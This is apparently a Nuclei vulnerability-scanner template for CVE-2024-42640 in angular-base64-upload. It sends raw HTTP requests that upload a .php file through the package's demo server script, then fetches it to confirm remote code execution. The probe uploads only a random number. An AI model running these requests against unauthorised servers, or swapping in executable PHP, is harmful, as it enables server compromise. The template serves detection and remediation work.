id: CVE-2024-42640

info:
  name: Angular-Base64-Upload - Remote Code Execution
  author: s4e-io
  severity: critical
  description: |
    angular-base64-upload prior to v0.1.21 is vulnerable to unauthenticated remote code execution via demo/server.php. Exploiting this vulnerability allows an attacker to upload arbitrary content to the server, which can subsequently be accessed through demo/uploads. This leads to the execution of previously uploaded content and enables the attacker to achieve code execution on the server. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
  impact: |
    Unauthenticated attackers can upload arbitrary files and achieve remote code execution on the server.
  remediation: |
    Upgrade angular-base64-upload to version 0.1.21 or discontinue use as the product is no longer supported.
  reference:
    - https://github.com/rvizx/CVE-2024-42640
    - https://www.zyenra.com/blog/unauthenticated-rce-in-angular-base64-upload.html
    - https://github.com/adonespitogo/angular-base64-upload
    - https://nvd.nist.gov/vuln/detail/CVE-2024-42640
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
    cvss-score: 10
    cve-id: CVE-2024-42640
    cwe-id: CWE-94
    epss-score: 0.43683
    epss-percentile: 0.98572
  metadata:
    max-request: 4
  tags: cve,cve2024,angular,rce,vkev,vuln

variables:
  filename: "{{to_lower(rand_text_alpha(12))}}"
  num: "{{rand_int(1000000,9999999)}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /node_modules/angular-base64-upload/demo/server.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"base64": "{{base64(num)}}", "filename": "{{filename}}.php"}
      - |
        POST /bower_components/angular-base64-upload/demo/server.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"base64": "{{base64(num)}}", "filename": "{{filename}}.php"}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body_1,"uploads/{{filename}}.php") || contains(body_2,"uploads/{{filename}}.php") '
          - 'status_code_1 == 200 || status_code_2 == 200'
        condition: and
        internal: true

  - raw:
      - |
        GET /node_modules/angular-base64-upload/demo/uploads/{{filename}}.php HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /bower_components/angular-base64-upload/demo/uploads/{{filename}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body_3, "{{num}}") || contains(body_4, "{{num}}")'
          - 'status_code_3 == 200 || status_code_4 == 200'
        condition: and
# digest: 4a0a00473045022100877d2ec6cf623229910ab6dcc333338137387e3231a2770c0d5de17ef9e1e68e02205e90eb575f66d5da1501fde31f5de8ee20525f4381da030f1c6928cc742b3af8:922c64590222798bb761d5b6d8e72950